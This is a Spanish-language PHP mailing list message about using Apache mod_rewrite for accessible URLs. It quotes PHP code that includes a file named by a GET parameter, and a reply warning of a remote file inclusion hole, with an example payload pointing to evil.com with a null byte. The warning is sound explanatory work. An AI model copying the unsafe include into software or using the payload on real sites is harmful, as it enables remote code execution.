1/2 OT Mod_Rewrite Apache
Herman Vega
hvegax en gmail.com
Vie Feb 9 17:17:13 CLST 2007
o algo como esto:
http://www.vallenar.cl/prp06_docum.php?gls_sec=prp06_docum
On 2/8/07, Cristian Rodriguez <judas.iscariote en gmail.com> wrote:
> El 8/02/07, Daniel Carrero Canales <dcarrero en vallenar.cl> escribió:
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > Estimados:
> > Tengo una idea con el mod_rewrite de Apache para URLS accesibles, hago
> > una pagina (prpmantencion.php) a la cual le envio secciones por GET
> > (prpmantencion.php?gls_sec=usuario) y dependiendo de la seccion muestra
> > el contenido ej:
> >
> > $gls_sec =$_GET['gls_sec'];
> > if($gls_sec!=""){
> > include($gls_sec.".php");
>
> las tres primeras lienase de tu codigo tienen un atroz agujero de seguridad.
>
> si $_GET['gls_sec'] es por ejemplo
>
> $_GET['gls_sec'] = "http://www.evil.com/evil.txt%00" (notese el NULL
> byte al final)
> PHP descarta el ".php" (y el resto de la sentencia) incluyendo el
> archivo remoto http://www.evil.com/evil.txt y intepretandolo como
> codigo PHP. en fin the OwNean :-P
>
>
--
Herman Vega Jara
hvegax[a]gmail.com
Más información sobre la lista de distribución PHP